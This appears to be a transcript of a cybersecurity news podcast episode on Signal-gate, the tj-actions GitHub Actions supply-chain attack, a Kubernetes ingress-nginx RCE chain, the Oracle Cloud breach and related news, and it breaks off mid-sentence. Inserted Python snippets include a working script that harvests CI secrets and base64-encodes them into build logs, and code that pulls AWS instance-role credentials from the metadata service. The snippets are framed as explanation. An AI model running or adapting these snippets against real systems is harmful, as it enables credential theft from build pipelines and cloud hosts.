Risky Business #785 -- Signal-gate is actually as bad as it looks
Episode Date: March 26, 2025

On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news:

- Yes, the Trump admin really did just add a journo to their Yemen-attack-planning Signal group
- The GitHub Actions hack is smaller than we thought, but was targeting crypto
- Remote code exec in Kubernetes, ouch
- Oracle denies its cloud got owned, but that sure does look like customer keymat
- Taiwanese hardware maker Clevo packs its private keys into BIOS update zip
- US Treasury un-sanctions Tornado Cash, party time in Pyongyang?

This week's episode is sponsored by runZero. Long-time hackerman HD Moore joins to talk about how network vulnerability scanning has atrophied, and what he's doing to bring it back en vogue. Do you miss early 2000s Nessus? HD knows it, he's got you fam.

This episode is also available on Youtube.

Show notes:

- The Trump Administration Accidentally Texted Me Its War Plans - The Atlantic
- Using Starlink Wi-Fi in the White House Is a Slippery Slope for US Federal IT | WIRED
- Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories' CI/CD Secrets Exposed
- GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 3/21)
- Critical vulnerabilities put Kubernetes environments in jeopardy | Cybersecurity Dive
- Researchers back claim of Oracle Cloud breach despite company's denials | Cybersecurity Dive
- The Biggest Supply Chain Hack Of 2025: 6M Records Exfiltrated from Oracle Cloud affecting over 140k Tenants | CloudSEK
- Capital One hacker Paige Thompson got too light a sentence, appeals court rules | CyberScoop
- US scraps sanctions on Tornado Cash, crypto 'mixer' accused of laundering North Korea money | Reuters
- Tornado Cash Delisting | U.S. Department of the Treasury
- Major web services go dark in Russia amid reported Cloudflare block | The Record from Recorded Future News
- Clevo Boot Guard Keys Leaked in Update Package
- Six additional countries identified as suspected Paragon spyware customers | CyberScoop
- The Citizen Lab's director dissects spyware and the 'proliferating' market for it | The Record from Recorded Future News
- Malaysia PM says country rejected $10 million ransom demand after airport outages | The Record from Recorded Future News
- Hacker defaces NYU website, exposing admissions data on 1 million students | The Record from Recorded Future News
- Notre Dame uni students say outage creating enrolment, graduation, assignment mayhem - ABC News
- DNA of 15 Million People for Sale in 23andMe Bankruptcy
Transcript
Hey everyone and welcome to Risky Business, my name's Patrick Gray.
We've obviously got a great show this week, lots and lots to talk about, we'll get into
that in just a minute.
This week's show is brought to you by RunZero and RunZero's founder, HD Moore, will be along
in this week's sponsor interview to talk about why RunZero is going to be doing vuln scanning now and basically HD makes a compelling case that the incumbent vulnerability scanning
companies aren't really doing vulnerability scanning anymore. They're doing authenticated
scans and they're doing stuff on endpoints but in terms of being able to point a scanner
at, like, an IP range and get it to give you stuff to fix, it's not really what they're doing anymore, they're not very good at that anymore,
and RunZero is gonna step in and fill that gap so that is an interesting
conversation and it is coming up after this week's news which starts now and of
course we are gonna be talking about Signal-gate. Unless you've been hiding
under a rock you would know that senior government officials in the United States planned a military action
against Yemen, against the Houthi rebels in Yemen
over a signal group chat.
And they accidentally invited an editor
from the Atlantic to the chat.
They accidentally added him
and it's turned into a big scandal.
Here's a look at how major media outlets reported on this.
How on earth did this happen? The Trump administration accidentally texted me its
war plans. That is how the journalist Jeffrey Goldberg summed it up.
He is the editor-in-chief of the Atlantic magazine and he's written at length about
what beggars belief. He accidentally received top secret war plans
from defense secretary Pete Hegseth.
It is just shocking in several different ways.
This all happened on an encrypted text messaging service
called Signal, which is not approved
for sharing classified information.
Details so sensitive,
the reporter who accidentally received it all
opted not to publish them out of concern for national security.
So Adam, let's bring you into this now. Let's talk about this. And I mean, what do you even say here?
I mean, yeah, what is there to even say? It's been, it's actually really fun kind of watching this unfold because it's such an understandable story. Like normally when we're discussing, you know, deep cyber, you know, wonkery, it's not really very inclusive for the general
public. Whereas this one I think everyone gets. And there's just been such a great amount of,
you know, memes and hashtags and jokes, you know, way beyond just the regular, you know,
cyber security world. So it's been, it's been a fun ride. I mean, I managed to do a, do a really nerdy joke on this, which is, uh, why is everyone mad?
They were using a SCIF, uh, Signal Chat In Phone, uh, spelled with an F. But, uh, you know,
there's also 'new phone, who dis', um, you know, like lots of, yeah, the jokes, the
memes, uh, have been terrific, but we should break down like the story here.
I've got to say though, the coverage of this has basically been on the money from the major
media outlets.
They've very quickly honed in on the fact that the story here isn't that a journalist
was added to this group.
The story here is that the group existed in the first place.
One thing I haven't seen talked about that much is the fact that this would indicate
that there's probably a lot of other Signal groups
that we don't know about.
And I'm sort of surprised to not see
the media seizing on that.
Yeah, I mean, clearly if they're doing it in one place
and this is kind of normal practice,
they're gonna be doing it in all sorts of places.
And you can kind of see why, right?
I mean, it's super convenient.
Everyone's got a phone in their pocket,
actually tracking down to the SCIF is, you know, totally a pain.
So you can see why, but yeah, it's the, you know, it makes you wonder how much this is being used.
And, you know, clearly, you know, sharing information from, you know, it's one thing to be having conversations,
but also they were like, you know, copy pasting stuff.
And my question is, well, where were they copy pasting from? Maybe, maybe. And we'll get into that in a bit. But you're quite right that politicians and public
servants alike, they do use messaging apps like these, and sometimes in ways that aren't in
compliance with government regulations. And I personally think government regulations around
some of this stuff needs to change to just sort of better reflect reality, which is that a, you
know, a signal conversation might be the modern day equivalent of having a chat with someone in
the hallway.
It might not be something that needs to be subject to government record keeping requirements
and whatever.
And there's the whole other aspect to this, which is it's legally just iffy in the first
place because of records keeping requirements.
But if there is reform here,
under no circumstances would a principals committee
planning a military strike be allowed to use Signal, right?
So breaking down the story, obviously the news here
is that the Signal group existed in the first place.
I think the journalist involved, Jeffrey Goldberg,
did the right thing to a T, which is,
wasn't quite sure what was happening,
was added to this
group and thought it might have been some attempt to trick him and make him look stupid by reporting
on the data that was in there and then once they got closer to military strikes he like turned on
his radio and I think checked social media and saw that there
were reports of bombs falling exactly when this group said they were going to and at that point
left the group.
But we should probably talk about why
planning a military action over a signal group chat
is a bad idea.
And it's because the endpoints aren't secure.
Unquestionably, a lot of the participants in this group chat
were using their personal devices.
Now, America's adversaries would have already
been targeting those devices.
But now with a story like this in the open, knowing that they could access classified
information and that government business is being handled over these sorts of chats, you've
got to think they're going to redouble their efforts.
And further to that, you've got John Ratcliffe, you know, director of the CIA talking about
how Signal has been installed on his work computer.
So they're not just using the mobile app, you know, it's spread out onto other endpoints as well, work computers, maybe
some personal computers, we don't even know, and that's kind of a
problem.
Yeah, exactly, because, I mean, you know, given the alternatives of, like,
let's have this conversation on SMS text messaging, which, apart from the fact
that it's not really a group medium, is clearly not desirable, you know, Facebook
Messenger, not great. I mean, if you're going to use an app, Signal, you know, is probably the right choice if
this was a right choice at all, which clearly it wasn't. But then yes the
linking it to other computers because I mean you know an up-to-date iPhone
pretty, you know, about as best as you're going to get them.
Not if you're the Secretary of Defense, Adam, come on.
Well yeah, exactly. Like, the prices for, you know, Apple bugs clearly have gone up over the years,
But they're still achievable and people still sell them because they still exist
so yeah, it's not ideal and pushing it out onto computers just
increases the amount of attack surface that you've got there by such a lot as well. So yeah, I mean the whole thing is
kind of concerning, kind of a mess, and even though Signal is best case, it's still just bad overall.
No, best case is a SCIF, right? Even Trump's come out and said that, but again we'll get into that
a little bit later on. But look, we've got government officials denying that classified
information was leaked into this
conversation.
Jeffrey Goldberg has made some comments that make that seem really unlikely actually because
apparently you had things like up to the minute weather reports and information on targets
like the human identities of targets, which weapons were going to be used to target them
and things like that.
So almost certainly classified information was leaked into this chat.
But then there is the question of the cut and paste, right?
Because the level of detail that Goldberg describes going into this group chat
kind of indicates that it's at least a possibility that there was some copying
and pasting going on.
And you would presume that that copying and pasting was taking place from a document that should have been on the airgapped high side of the network.
And that is an aspect of this, that if there were to be an inquiry, that is the part, that's the first question you'd want to answer.
Was high side info being copy pasted into a single group chat that was winding up on endpoints that you don't even control?
Yeah, and that's just, that's not a... even the possibility of that is not great.
And you can just imagine how many people are grinding their gears at,
you know, Fort Meade and through all sorts of security agencies, thinking about like how many training sessions they've had to go to,
to learn not to do this and all of the rules and rigor and things
that they have to do in their everyday job,
all the inconveniences of managing sensitive information
and then seeing it just kind of yoloed like this,
it must just be super aggravating.
Now keep in mind too, the Houthis are essentially
in control of, last time I checked,
which was a couple of months ago,
the areas where approximately 85% of the population in Yemen actually
live, right? So they are kind of the de facto government there now. And they are an Iranian
backed militia. They're an Iranian backed organization. So while the Houthis might not
have much of a cyber capability to go after, like government computers to try to read signal
messages and stuff, you know, the Iranians do, right?
So that's something to keep in mind.
So it is really, really bad.
What's been interesting is I heard Trump
on the radio this morning,
and he seems actually somewhat annoyed by this
and seemed to actually acknowledge
that this is extremely not great.
He talked about having been in the situation room previously
where other people were dialing in externally,
and he just said, terminate the lines, you know, that's not appropriate.
He said the best place to have these sort of conversations is in the Situation Room,
you know, preferably in a room lined with lead is what he was saying.
So he sort of, and it was funny because then he pivoted into an attack against the journalist
calling him a slimeball and you know, this sort of stuff, right?
So he sort of oscillated between acknowledging that this was not great, also said that they wouldn't be using Signal
as much in the future.
So he sort of seemed to acknowledge that this was an issue
while also going on the attack,
which is, you know, very Donald Trump of him.
Pete Hegseth, interesting thing there was he did a,
you know, he did some comments to camera
where he tried to do the Trump thing
of attacking the lying media and whatever, and it just doesn't work when he does it,
you know, like no one can quite carry that like, like Trump. But yeah, I mean, there's many layers
to this. There's the record keeping requirements side of it. There's the general sort of fast and
loose with classified info side of it. There's the, I mean, it's just, you know, it's a little
bit different to similar scandals we've seen in the past with like Hillary Clinton's emails, which did not involve real time planning of
military action.
You know, we have seen politicians sort of get caught doing this.
We had another instance where a German military figure was dialling in from an insecure line
into some sort of, I think it was a Zoom call, like a, you know, gov, gov grade zoom call or whatever, but could only dial in and was discussing details,
limited details about delivering Taurus missiles to Ukraine for them to use
against Russians and that call was intercepted. But again, it wasn't like, okay
they're gonna be in these trucks on these roads at this time. This just seems
really bad and absolutely not the sort
of stuff you would want in a group chat.
The fact that they accidentally included an editor at the Atlantic is just the cherry
on top here.
It's such a beautiful thing.
Oh boy.
I wondered actually when I read some of this, like I wonder what Moxie, Moxie Marlinspike,
who did a bunch of the work on Signal and developing it originally, and he's kind of a hippie, kind of a punk. I wonder how he feels about
Signal being used accordingly.
Well, he was on social media the other day
posting a guide to how to make sure you're not accidentally
adding the wrong people to your Signal group chats which was pretty funny.
Hey just a reminder folks, here's a guide that we wrote. Yeah, dear oh dear. Honestly, I think it's been a great story just because it's so accessible
for everybody else outside our sphere. And I think this is a good reminder for everybody
about how opsec works and keeping an eye on the group chats and thinking about where you're
talking about these kinds of things. So, you know, I can't imagine we'll see much change beyond a little bit less use of Signal in US gov,
but, you know, it's been, it's been a fun ride.
Yeah. I mean, I think probably the one aspect to this that's been misreported
though, is people are sort of left with the impression that Signal's very secure
and there's not much of a risk because everything's encrypted. And of course,
some stories are even now updating saying, well, while the messages are not likely to be, you know, intercepted in transit, obviously there is a problem if
a hacker is able to gain access to one of the endpoints on those computers. So I think
that that part has kind of been lost. But yeah, this is really, I think there's a lot
of listeners, or some listeners, at least to this show, who would be wondering whether
or not this is a big deal and whether or not this is as bad as it looks. And it actually is. This one actually is.
Yeah, it totally is. And I guess the good thing is people will learn some lessons from
it, I guess, from the fallout.
I think even Trump said that his national security adviser had learned a lesson here.
So I just found it interesting seeing Donald Trump
acknowledge that this was not ideal, right?
Because that's not his normal style.
No, you have to really screw up before you get that out of him.
But again, the issue here is that this isn't going to be the only group chat.
You wonder what else they're doing and you wonder what the security of the endpoints
where this stuff is winding up is and they need to rein it in.
They definitely need to rein it in.
And then there's the record-keeping stuff, and yeah, just top to bottom, a bit of a cluster,
as they say.
And just, you know, in the same theme, we spoke previously about some of this Doge stuff
and how it was a data governance concern, because we weren't sure if people were being
careful and whatnot.
And this sort of feeds into all of that, as does this next story.
Lily Hay Newman has it for Wired.
Apparently figures at the White House are like slapping Starlink dishes on the roof
to like boost the Wi-Fi on the White House campus.
And again, probably not ideal.
No, certainly not ideal from a,
you know, kind of like it's just shadow IT, right?
And shadow IT, any workplace is going to cause you trouble.
And doing this in the White House seems extra dumb, especially when, you know, the point
of Starlink is to service regions where you have not great coverage.
And clearly, you know, both mobile and wired network coverage in the White House is probably
pretty good.
Like their Wi-Fi might be crap, which we've seen a few people complain that that is the
case.
But I think one thing I thought was funny was it's not like the dishes are on the roof
at the White House.
They're at the White House data center and then they run over fiber to the actual White
House, which...
This doesn't make any sense.
It doesn't make any sense.
It just smells like Elon and Trump going, yeah, let Elon do whatever the hell he wants.
And now there's a, you know, Starlink terminal serving the White House.
But yeah, it just seems a little bit bonkers.
And again, there must be so many aggravated people that work so hard, you know,
on doing these things like both procurement and technical installation and so on and so forth,
in the right way. And then you see this and it's just, you know, kind of an affront to your profession.
This one is like, it's not the end of the world, right?
Because Wi-Fi, it's all unclassed, whatever, right?
Like it's not ideal, but it's not the end of the world.
And it's kind of weird.
Whereas that previous story we're talking about is like, Oh my God, what are you doing?
This is, this is, you know, critically dumb.
Uh, so yeah, just, but they both come from the same place,
which is to sort of throw a convention out the window and just do it the easy way.
And, you know, move fast and break things, right?
This is a move fast and break things government.
And, you know, that's what all of that looks like.
All right. So we're going to move on to other news.
And we've got an update here about the GitHub action
supply chain attack that we spoke about last week. So new stuff has come to light
like, you know, you and I are absolutely not GitHub experts, right, and we were sort of
speculating a bit last week about like GitHub actions and like what they can
actually do. Since then I've had listeners write to me and say look
they're just glorified bash scripts, right? If the attackers wanted to
they could have absolutely
exfiltrated this information.
They did not need to write it into build logs as they were.
I've had other people write to me and say that we missed it
because no one was going to notice this information
in the build logs in the first place, so it was pretty smart.
I'd kind of counter that by saying, well,
obviously someone did notice, which is
how we know about all of this. So what there is to update here on, for those who
missed it, it just meant that, you know, someone backdoored essentially a popular GitHub action,
which when they used it would scrape the memory of their build server for tokens and sensitive
stuff. They would base64 encode it and crap it out into the build log,
which would be public for public projects. So the attacker could come back and then obtain
that secret material. So the update is that it looks like only a couple of hundred projects were
affected because I think maybe only a couple of hundred ran that build. And it looks like
this was part of a supply chain attack that previously was targeting Coinbase,
which is interesting. So it looks like maybe maybe crypto thief type stuff here.
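For listeners who want to picture the mechanism, here's a rough, hypothetical sketch in Python of what a step like this is effectively doing. Nothing in it is the actual tj-actions payload, and the real attack dumped the runner's process memory rather than just environment variables, but the shape is the same: grab anything that looks like a secret, base64-encode it, and print it into the (public) build log for the attacker to collect later.

```python
import base64
import os
import re

# Hypothetical illustration only: the real payload dumped runner process
# memory; this sketch just scrapes environment variables that look like
# CI/CD secrets and writes them into the workflow log.
SECRET_HINTS = re.compile(r"(TOKEN|SECRET|KEY|PASSWORD)", re.IGNORECASE)

def harvest_secrets() -> dict[str, str]:
    """Collect environment variables whose names look like credentials."""
    return {k: v for k, v in os.environ.items() if SECRET_HINTS.search(k)}

def exfiltrate_via_build_log(secrets: dict[str, str]) -> None:
    # Base64 makes the blob look like noise in the log, but anyone who can
    # read a public repo's build log can decode it after the fact.
    blob = base64.b64encode(str(secrets).encode()).decode()
    print(f"::debug::{blob}")  # lands in the workflow log output

if __name__ == "__main__":
    exfiltrate_via_build_log(harvest_secrets())
```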
Yeah, yeah, it does feel that way. We've seen the thread kind of pulled as to how people
got access to the action. So it looked like there was another upstream action that itself
got compromised and then access token for that was used to write into the one that we
were talking about last week. But yeah, some of the changes early on in this process, once
we've started to see the whole timeline, did look like it was specifically targeting an
integration toolkit for like AI and blockchain that Coinbase work on. And that was what they
were actually trying to achieve. And it looks like they did in fact get tokens out of that particular project, whether or
not those tokens were useful.
Most of the tokens apparently were like time-limited ones used by the build process that stopped
being valid after it finished.
But yeah, it looks like smaller scale than we thought, but not 100% sure whether it then
resulted in them getting towards the target that they were going for,
which was this code base from Coinbase.
Yeah, so it looks like this is essentially something
that got caught in time.
Pretty clever stuff though, and it just has to be repeated
that crypto, cryptocurrencies have done a lot
for the state of attacks, right?
Of the type of attacks that we see in, in public, because, you know,
they're always interesting, right? You've got supply chain attacks. Uh,
you've got, I mean, the, uh, what was it?
The Bybit thing was just fascinating. Like, yeah. I mean,
can you imagine going up against adversaries who do this? Like they're really clever.
Yeah, yeah, absolutely. That's great motivation. And, you know, there's also
the aspect of that we get to see more of these attacks because of the publicity
of the blockchain, right? When it finally gets to action on objectives of
stealing crypto, we then get to pull the thread backwards to see how it worked.
Whereas in so many other attacks, we don't really have a way to pull that
thread and see, you know, what this tradecraft looked like and how the targeting worked.
And so, yeah, it's kind of, you know, of all of the dumb things that crypto has done for
us, you know, the way that it has pushed both the state of the art of attacking and also
unraveling attacks forward, I think it's good for us.
It certainly is.
I mean, it's like I find myself most stimulated by reading the incident reports on this stuff
You know, it keeps life interesting. We've been doing this a long time, right?
So we got to say like, you know, keep it going. Keep it going.
I mean, LulzSec was more fun, but this is still good.
Yeah, yeah. Well, this is better hacking, right? LulzSec was sqlmap and Jake Davis writing funny.
Yes, better comedy.
Better comedy.
Better comedy, that's true.
All right, so now we're going to talk about a bunch of CVEs,
like a bug chain, in something called Ingress NGINX
Controller for Kubernetes.
And it's rare for us to, although not so much lately,
we've been talking about a few bugs lately in the news
segment quite close to the top, because there've been some doozies.
But this is a terrible bug chain
with a like near 10 out of 10 CVSS,
which is gonna impact thousands, thousands
of Kubernetes clusters around the world
that are attached to the internet
and vulnerable to this.
Walk us through it because this is bad.
It is, it is.
So researchers from Wiz pulled together this bug chain. I don't think they've
seen it in the wild. I think this was independent research. And so Kubernetes is kind of a cloud
orchestration system where you have a bunch of compute that you want to run jobs on and then
Kubernetes lets you orchestrate all the involved computers, the network connections, and the kind
of plumbing in and out. And Kubernetes is a big jumble of components,
and you can kind of pick and choose which components you
use to build your particular instance of a cluster.
One of the bits of functionality is kind of for setting up
paths into the cluster from the outside.
So if you want to expose a web server running inside your, you know, the application running inside your cluster to the outside, there's a way of kind of plumbing it
through from the network edge into the middle of the virtual compute. And the Nginx Ingress
Controller is one piece of software that you can use to kind of do a part of that process.
And it uses the Nginx reverse proxy to kind of implement this network plumbing.
So what they found was that when you are deploying this configuration into your cluster,
there is a process by which this NGINX controller will validate the configuration.
The overall plumbing generates configuration files to be fed to NGINX
so that NGINX can implement the network plumbing it needs. And that process of testing
configurations turned out you could inject into that configuration file that's being built and
leverage behavior of NGINX to do things that the attacker wants to do. And through all of this,
what Wiz did was they basically found a way to write files to disk,
like by starting a file upload and then not finishing it.
So is this all pre-auth?
So in this case, yes, this is pre-auth.
I don't know that it needs to be pre-auth, but you could reach the Ingress controller pre-auth in the common configuration. So they would do a file upload and then they would submit
a configuration for testing that would load an external module, so a shared object file on Unix,
DLL on Windows, but you know in this case a shared object file that lets you run arbitrary
code. So by the power of kind of a midway through file upload and then being able to inject into the
configuration file, they leverage that upwards into arbitrary code exec. So this is in the wrap-up,
you know, CVSS 9.8 code exec in a privileged spot in your Kubernetes environment. Because of
the privilege that these ingress controllers need, it's roughly equivalent
to having full access to the cluster. You can steal enough tokens to go
onwards to great victory, and so yeah, this is a good bug. The Wiz
researchers do point out that you could probably exploit this via
server-side request forgery or any other mechanism you can use to kind of
make a web request from inside the cluster. So the remote,
unauth-from-the-internet way of doing this is one, but also anywhere where you can kind of
originate a web request inside the cluster, which, let's face it, is pretty damn common.
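As a practical aside, the quickest triage step here is working out whether your ingress-nginx admission webhook is reachable from places it shouldn't be. Below is a minimal, hedged reachability sketch; the default service name and port in it are assumptions (adjust for your cluster), and it doesn't test for the vulnerability itself, it only tells you whether the component the bug lives in answers from a given network position.

```python
import socket
import sys

# Minimal sketch: can we open a TCP connection to the ingress-nginx
# admission webhook from wherever this script runs? The service name and
# port below are assumptions about a common default deployment.
DEFAULT_TARGETS = [
    ("ingress-nginx-controller-admission.ingress-nginx.svc", 8443),
]

def is_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    targets = DEFAULT_TARGETS
    if len(sys.argv) == 3:
        targets = [(sys.argv[1], int(sys.argv[2]))]
    for host, port in targets:
        status = "REACHABLE" if is_reachable(host, port) else "not reachable"
        print(f"{host}:{port} -> {status}")
```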
Yeah, yeah, yeah.
At that point you'd need more than just edge network controls.
No one's doing the right sort of filtering on those sort of requests, right, to stop them
rattling around inside. So, no, it's just, you know,
Kubernetes is so complicated.
Like all of those kinds of cloud in a box sorts of things are really complicated
and mapping the network flows inside them is complicated.
And yeah, yeah.
Now it looks like there's been some sort of data breach at Oracle cloud affecting
something like six million records from 140,000 tenants. Oracle came out and said no this is all nonsense and then the
researchers at CloudSEK who were talking about this brought some receipts.
Yeah this is not great it looks like someone had some kind of either code exec
or file read on the SSO system for Oracle's Cloud Edge.
I don't really know how Oracle is claiming that this wasn't
a data breach of some sort, but the researchers at CloudSEK
correlated the data they had with some tenants,
with public records of those tenants URLs,
and indeed found some people who could confirm that those
were the correct credentials.
So the hackers appear to have got, like, Java keystore files
and other kind of credential material from the SSO system.
And that's just not good.
Cause you know, there's like thousands of customers
and you know, I don't know how many important things
are on Oracle's cloud.
I don't know if TikTok's there yet, lol.
But yeah, it's just not good.
Yeah, no, so I think that's a decent summary.
Not good.
It's not good.
It's not good.
And speaking of attacks targeted towards
major cloud platforms, Paige Thompson,
who was the Capital One hacker,
and the reason I mention this as a cloud thing is because she was abusing the AWS metadata service, right? Like an old
version to do this attack. You know, when she was sentenced to time served in five years
probation, we even said at the time that we were really surprised that that sentence was
handed down, right? That it was so lenient. And a federal appeals court has now overruled
that sentence and it looks like she's off for re-sentencing.
So yeah, probably not a great time to be Paige Thompson.
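For anyone who missed the Capital One saga, the metadata service angle works roughly like this: a request-forgery bug that can make requests on the instance's behalf can ask the old, unauthenticated IMDSv1 endpoint for the instance role's temporary credentials. Here's a hedged sketch of that request; it only does anything from inside an EC2 instance, and IMDSv2's session tokens are the mitigation.

```python
import json
import urllib.request

# IMDSv1 sketch: unauthenticated requests to the link-local metadata address.
# Only works from inside an EC2 instance; shown to illustrate why an SSRF
# that can reach this address is so valuable, and why IMDSv2 (which requires
# a session token obtained via a PUT request first) blunts the technique.
IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

def fetch(url: str) -> str:
    with urllib.request.urlopen(url, timeout=2) as resp:
        return resp.read().decode()

if __name__ == "__main__":
    role_name = fetch(IMDS).splitlines()[0]      # first attached IAM role
    creds = json.loads(fetch(IMDS + role_name))  # temporary keys for it
    print("Role:", role_name)
    print("AccessKeyId:", creds.get("AccessKeyId"))
```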
Yeah, yeah, I mean, I imagine, you know,
it probably isn't a great time at any point
in the last couple of years
because it's certainly been a mess, but yeah.
I mean, on the one hand, you know,
you feel for her, being transgender in the US full stop at the
moment, let alone going through the courts and through the incarceration system like
this.
But at the same time, she was kind of gloating about this and encouraging people to hack
the customers and stuff.
So I can kind of see, you can kind of see both sides of the decision here.
So yeah, we'll see what the re-sentencing looks like.
Yeah, the original judge in 2022 said the hack wasn't done
in a malicious manner and that Thompson was tormented
about her activities, noted that she's transgender,
autistic and had suffered past trauma.
So I think the judge, I think by the looks of things,
just felt for her, but yeah, could be.
I'm probably expecting some prison time there. Let's see. Now, this is an interesting one. US Treasury has dropped
its sanctions on tornado cash. Now, tornado cash, of course, is a cryptocurrency mixing
service, which runs on the blockchain. No one's really controlling it
anymore. But it is subject to sanctions, so you're not allowed to interact with it; basically
you will fall afoul of US sanctions interacting with it.
The people who actually created tornado cash and who receive profits from people putting
money through it have all been charged with various money laundering offenses but it looks
like what's happened is
some people who use tornado cash
filed a suit to challenge the sanctions.
And it was backed by, the lawsuit was backed by
one of the cryptocurrency exchanges,
I can't remember which one.
But it looks like they succeeded
and the courts decided that
Treasury had overstepped its authority
in sanctioning tornado cash
because it's not actually being operated
by a foreign hostile government, right?
So they said, no, you can't sanction it.
Looks like Treasury has looked at the ruling,
done its own analysis,
and maybe not gonna appeal this
because they've actually removed the sanctions.
So good news if you're a North Korean money launderer.
Yeah, I mean, you can kind of see why the technicalities of this are a little fiddly,
but at the same time the outcome, which is apparently it's fine to just use tornado
cash to launder your crypto if you're DPRK or anyone else.
I guess the DPRK entities are still sanctioned in many cases, but yeah, in general, the fact that
you could just money launder with it doesn't seem like a great outcome.
Money laundering is okay now!
Yes. The charges, though, against the people who started Tornado Cash, they have not been dropped, right? And we'll see.
I mean, I'm guessing their lawyers are gonna be all over this and they're gonna try to see if they can turn this into
a break for their clients.
But yeah, I wouldn't hold my breath necessarily if I were them.
Now, what's going on with Cloudflare in Russia?
Because it looks like Cloudflare got temporarily blocked and that this may have been a warning shot from the Kremlin. Yes, so they got added to a list of services that weren't complying with Russia's rules
about local data retention and deception and so on.
Being added to that list doesn't necessarily mean that you're automatically blocked, but
clearly someone at Roskomnadzor or whatever else decided that they were going to go implement
it. There's quite a lot of Russian customers for Cloudflare,
both international properties, but also domestic stuff.
And some of the Russian internet commentary has been suggesting
that this might be a warning shot to discourage local customers
and to encourage them to use alternative, you know, Russian
equivalent DDoS protection or, you know, front-end services like CloudFlare.
Obviously CloudFlare is not going to comply with Russia's rules for storing
data domestically and handing them over to the Russian government, so, you know,
clearly if you are a Russian user of it, probably it is time that you got off
that platform. Yeah, it'd be interesting to see if people actually do though, right?
Well, yeah. I mean, cause you know, cloudflare has, you know,
they're quite good at what they do and hiding
in the morass of other cloudflare customers is part of the point of that.
You know, you can...
Strength in numbers, right? Like you can't ban them all.
You know, that's the whole point, right?
So I'll be... I'm just curious to see if the Russian government can make this happen.
I would be actually kind of surprised if they can get everyone off Cloudflare
without having to cause major disruption and do perhaps a longer block.
Now, we've got a great one here, great bit of research from Binarly.
I guess you would pronounce it like binary, Binarly,
where they found a UEFI keymat leak, basically.
Walk us through this one.
Yeah, so they identified on a forum somewhere
that someone was posting about,
hey guys, it looks like there's private key material in this BIOS, can we use it to make a BIOS that
loads CoreBoot, which is like an open source, you know, alternative BIOS implementation.
And so, Binarly went and looked at it and it turns out that there's a vendor called Clevo, or Clevo, who make kind of barebones laptops, I guess.
So laptop chassis, which are then reused
by a whole bunch of other manufacturers
to sell their laptops.
So if you buy a like gigabyte branded laptop,
what you're actually buying is a Clevo manufactured device
that the actual model number and specs
have been then added on by
by gigabyte. And so Clavo provide the underlying BIOS for these systems and it
looks like when they zipped up this particular BIOS update they just left
the private key files in zip. So that's not great. So Binale went and looked
through their archive of
bioses and various things to figure out which actual systems matched the public
and private keys that were stored in those things and identified something
like, you know, 15 firmware images corresponding to 10 laptops, mostly
gigabyte devices that, you know, matched the key material. So, yay, that's good, I guess.
I mean, it's great for the SIGINT operators
who are listening to this, who want to get some real
persistence on a gigabyte branded laptop, I mean.
Well, exactly, yes, yeah.
And the open source hippies, they want to run their own
BIOS and so on and so forth.
But yeah, it just underscores the complexity of managing
hardware-anchored trust roots in the open ecosystem
that is PC hardware versus a closed environment
like Apple or Cisco hardware or whatever else.
Yeah, yeah.
Now we've got a report here from Cyberscoop.
This one's done the rounds at a whole bunch of outlets.
I think it was, was it CitizenLab who did this report?
Yeah, it was CitizenLab looked at Paragon spyware, right?
To try to identify more countries
that were actually using it.
And it looks like they found that in Australia, Canada,
Cyprus, Denmark, Israel, and Singapore.
I actually got a message from an Australian journalist,
like a not cybersecurity journalist.
Hi, if you're listening, I won't name you,
but yeah, they were asking me like, oh, what do you think about Australia being a
customer of Paragon? And I just thought, well, you've got to get your spyware
from somewhere, right? It's like, this is a major player that seemed to respond
well when it was, you know, revealed that the Italians had been abusing it.
They immediately ceased any contracts with Italy.
I just sort of feel like, you know, it's great to have this sort of information
on the record, but you know, as an Australian, I'm not particularly worried
that Australia is a customer of Paragon, given the way that this stuff is used
in Australia, it's overseen pretty heavily.
Like the oversight is good, the court oversight is good, the government
oversight is good, so I don't know that there's much to say here.
Yeah, I mean, I went and read the actual research
out of Citizen Lab, and the way they did this
was by looking at trying to build fingerprints
for some of the devices involved.
And like many of these spyware systems,
there's kind of a couple of tiers of servers
that handle the initial contact
and then subsequent spyware installation.
And so they kind of looked for SSL certificate fingerprints
and other kind of fingerprinting aspects
and pulled those threads combined with historical records
over time to try and identify where these systems were,
and then tie that back to address ranges and customers.
And one of the more concrete ones they found
was links back to the Ontario Provincial Police
in Canada, for example.
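The fingerprinting technique itself isn't exotic; conceptually it's something like the sketch below, which is our rough illustration rather than Citizen Lab's actual tooling: pull the certificate a server presents, hash it, and then look for that same hash (alongside other distinctive TLS features) across internet-wide scan datasets and historical records.

```python
import hashlib
import ssl
import sys

# Rough illustration of certificate fingerprinting, not Citizen Lab's tooling:
# grab the leaf certificate a host presents and compute its SHA-256 hash.
# Matching that hash against internet-wide scan data is what lets researchers
# group servers that appear to belong to the same infrastructure.

def cert_sha256(host: str, port: int = 443) -> str:
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest()

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    print(host, cert_sha256(host))
```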
But overall, this is still kind of suggestions rather than it being like direct links or
direct evidence.
But still, I mean, it's really solid research and the sort of thing that Citizen Lab is
well equipped to do.
But I mean, as you say, like other than, you know, telling your Aussie journo mates that maybe the Australian government should buy local, you know,
buy local spyware instead of imported foreign stuff. But yeah, I mean, you know, as you say,
it's got to come from somewhere if they want to have that capability and better they buy it off
the shelf than spend way more money trying to develop this capability badly in-house.
Yeah. And I think, you know, from everything that we've seen,
we just don't have any sort of concerns around the abuse of this stuff here.
Like, famously, when Gamma Group got hacked
and all of their help desk tickets wound up being leaked,
I think the funniest thing that happened there was,
was the tickets from the Australian authorities
were all about, like like them getting mad with
Gamma Group who made, what was it, FinFisher or FinSpy or whatever it was, getting mad
at them because they couldn't do as granular filtering as they would like to exclude intercepting
material from their targets, like talking to their lawyers and stuff like that.
So that was the stuff that they were lodging tickets over
was like, we need to better comply with the warrants
that we've been given by the courts to do this action,
which was really reassuring,
seeing, I think it was New South Wales police
actually lodging those tickets saying,
